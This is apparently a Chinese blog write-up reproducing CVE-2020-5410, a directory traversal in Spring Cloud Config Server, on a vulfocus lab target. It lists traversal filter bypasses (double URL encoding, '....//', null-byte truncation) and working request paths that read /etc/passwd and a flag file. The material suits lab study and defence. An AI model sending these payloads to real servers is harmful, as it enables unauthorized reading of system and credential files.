-
【漏洞复现-spring-目录遍历】vulfocus/spring-cve_2020_5410
目录
一、靶场环境
1.1、平台:
123.58.224.8:43117
123.58.224.8:20746
1.2、知识:
1、跳目录
../上一级
(有时候可能需要考虑绕过过滤)
单次过滤:....//
正则匹配斜杠:..%252f(双重URL编码,因为浏览器会解码一次)
起始路径匹配:起始路径+相对路径结合绕过
后缀检测:空字节绕过(%00截断)../etc/passwd%00.png
……
1.3、描述:
Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。
二、漏洞验证
2.1、分析:
对/进行了2次URL编码
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fpasswd%23foo/development
读取flag文件
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Ftmp%23foo/development
-
相关阅读:
Nacos 是如何同时实现AP与CP的
consumer罢工,几千万条im聊天数据积压在MQ中,解决思路
centos7系统下postgresql15离线安装,卸载
金仓数据库 KingbaseES 插件参考手册 pldbgapizw33
4-9封装与隐藏
java ssm野生动物公益保护网站系统
MyBatis 映射文件(Mapper XML):配置与使用
【Linux网络编程】TCP/IP协议详解
Redis高可用原理 主从哨兵集群
Qt5开发及实例V2.0-第十四章-Qt多国语言国际化
- 原文地址:https://blog.csdn.net/qq_53079406/article/details/127338393